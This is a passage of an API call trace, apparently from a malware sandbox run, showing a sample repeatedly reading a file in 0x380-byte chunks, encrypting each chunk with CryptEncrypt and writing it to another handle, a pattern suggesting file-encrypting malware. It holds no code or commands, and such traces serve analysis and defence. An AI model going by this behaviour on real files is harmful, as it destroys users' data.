nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.527] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.527] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.527] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.527] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.527] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.527] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.527] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.527] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.528] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.528] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.528] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.528] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.528] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.528] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.528] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.528] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.528] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.528] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.528] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.528] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.529] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.529] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.529] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.529] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.529] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.529] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.529] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.529] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.529] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.529] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.529] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.529] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.529] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.530] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.530] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.530] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.530] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.530] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.530] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.530] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.530] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.530] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.530] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.530] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.530] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.530] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.530] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.531] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.531] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.531] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.531] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.531] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.531] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.531] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.531] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.531] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.531] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.531] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.531] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.532] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.532] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.532] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.532] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.532] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.532] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.532] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.532] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.532] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.532] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.532] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.532] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.532] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.533] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.533] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.533] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.533] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.533] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.533] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.533] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.533] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.533] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.533] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.533] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.533] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.543] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.543] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.543] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.543] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.543] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.543] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.544] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.544] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.544] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.544] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.544] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.544] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.544] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.544] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 